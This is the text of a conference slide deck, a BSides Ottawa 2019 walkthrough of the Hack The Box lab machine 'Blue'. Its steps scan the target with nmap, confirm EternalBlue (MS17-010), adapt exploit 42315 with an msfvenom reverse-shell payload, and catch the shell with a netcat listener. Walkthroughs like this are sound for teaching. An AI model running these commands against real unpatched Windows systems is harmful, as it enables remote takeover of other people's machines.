TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
BSides Ottawa 2019 - HTB Blue
1.
2. WHOAMI
• Diana Whitney
• IT Security Specialist at EWA-Canada since 2015
• Payment Assurance Lab – PCI PTS POI Standards testing
• Secure That Cert! CySA+ and PenTest+
3. RECONN WITH NMAP
• nmap -sC -sV -O -oA initial 10.10.10.40
• -sC scans the target using the default Nmap scripts
• -sV attempts to identify the version of services found running
on open ports
• -O attempts to ID the host’s operating systems
• -oA outputs the scan results into a file called ‘initialscan’
• 10.10.10.40 is our target
4. • Port 139 is open and running netbios-ssn
• Port 445 is running Microsoft-ds
• Ports 135, 49152-7 are running msrpc
5. Our scripts used the SMB protocol running on the open ports to lea
more about the host:
• OS – Windows 7 Pro
• Security mode
6. MORE NMAP
• Initial scan only scans the top 1000 ports
• Adding -p- to the command tells nmap to scan all 65535 ports
• To scan UDP ports instead of TCP ports
• nmap -sU -O -p- -oA udpfull 10.10.10.40
7. NMAP VULNERABILITY SCRIPTS
• nmap --script vuln -oA vulnerabilities 10.10.10.40
• Previous scan used nmap’s default scripts – fast and non
invasive
• Vulnerability scripts will look for any potential exploits on the
open ports
8. • Script smb-vuln-ms17-010 returned a positive result
• Code execution vulnerability in MS SMBv1 servers
• CVE-2017-0143 - EternalBlue
9. • Developed by the NSA and leaked by Shadow Brokers hacker
group in 2017
• Exploits SMBv1 protocol in unpatched Windows servers
• Allows a remote attacker to execute arbitrary code on a
vulnerable machine by sending specially crafted packets
• Used in the WannaCry and NotPetya ransomware attacks of
2017
• CVE-2017-0143
10. • searchsploit --id ms17-010
• Searchsploit is a command line search tool for Exploit-DB
• Not using Metasploit
• Searches for possible exploits for this vulnerability – we will use 42315
12. LET’S EXAMINE THE CONTENTS OF
42315.PY…
• There will be a function call for ‘mysmb’
• We can get it from the provided URL using wget
13. • File will be saved as 42315.py.1, since we already have a
42315.py
• Change the filename:
• mv 42315.py.1 mysmb.py
14. • The script requires credentials in order to exploit the target
• We find them using enum4linux
• Since ‘none’ is an option, we can assume this machine allows
us to log in with no username or password.
15. • Last we need to modify the python code to add a payload
• This will be the executable file we send to the target machine
and have it run
• To gain access to the target, we’ll send a payload that will set
up a reverse shell request
• Generate the payload using MSFVenom
16. • msfvenom -p windows/shell_reverse_tcp -f exe
LHOST=10.10.14.x LPORT=4444 > eternalblue.exe
• -p – our payload – windows/shell_reverse_tcp
• -f format – exe
• LHOST – the IP address of our attack machine (local host) – 10.10.14.7
• Your IP address can be found on HTB ‘Access’ page, or by running ifconfig
• LPORT – a port on our machine – we’ll use 4444 since it’s unlikely that it’s being used for
anything else
• eternalblue.exe – the executable file generated by this command
17. • Alter the script to send eternalblue.exe from its location on the
host machine to the target machine
• Script will then execute eternalblue.exe on the target machine
18. • Use Netcat to set up a listener on the attacking machine
• nc -nvlp 4444
• The attack machine is now listening for an incoming request
from the target machine
• Now run the python script
• python 42315.py 10.10.10.40
19. WHEN the python script runs successfully, the reverse shell request will be
by the attack machine. We now have access to the target. Run ‘whoami’ in
No privilege escalation required – EternalBlue has granted us system ac